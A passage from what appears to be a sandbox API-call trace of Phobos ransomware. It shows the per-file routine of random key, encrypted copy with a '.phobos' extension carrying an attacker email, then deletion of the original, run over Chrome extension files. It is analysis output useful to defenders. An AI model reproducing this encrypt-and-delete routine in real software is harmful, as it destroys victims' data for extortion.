hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.292] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.293] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.293] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.293] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.293] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.293] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.293] CloseHandle (hObject=0x188) returned 1 [0148.293] CloseHandle (hObject=0x148) returned 1 [0148.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json")) returned 1 [0148.294] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.295] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=224) returned 1 [0148.295] CloseHandle (hObject=0x148) returned 1 [0148.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json")) returned 0x2020 [0148.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.295] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.295] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.295] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe0, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.296] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.297] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.297] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.297] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.298] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.298] CloseHandle (hObject=0x148) returned 1 [0148.298] CloseHandle (hObject=0x188) returned 1 [0148.298] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json")) returned 1 [0148.299] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.299] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0148.299] CloseHandle (hObject=0x188) returned 1 [0148.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json")) returned 0x2020 [0148.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.300] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.300] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.300] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.300] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.300] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0148.301] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.301] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.302] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.302] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.302] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.302] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.302] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.302] CloseHandle (hObject=0x188) returned 1 [0148.302] CloseHandle (hObject=0x148) returned 1 [0148.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json")) returned 1 [0148.303] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.307] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=225) returned 1 [0148.307] CloseHandle (hObject=0x148) returned 1 [0148.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json")) returned 0x2020 [0148.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.307] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.307] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.308] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.308] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe1, lpOverlapped=0x0) returned 1 [0148.309] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.309] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.310] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.310] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.310] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.310] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.310] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.310] CloseHandle (hObject=0x148) returned 1 [0148.310] CloseHandle (hObject=0x188) returned 1 [0148.310] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json")) returned 1 [0148.312] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.312] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=291) returned 1 [0148.312] CloseHandle (hObject=0x188) returned 1 [0148.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json")) returned 0x2020 [0148.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.312] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.313] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.313] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.313] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.313] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x123, lpOverlapped=0x0) returned 1 [0148.314] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0148.314] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0148.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.315] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.315] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.315] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.315] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.315] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.315] CloseHandle (hObject=0x188) returned 1 [0148.316] CloseHandle (hObject=0x148) returned 1 [0148.316] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json")) returned 1 [0148.317] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 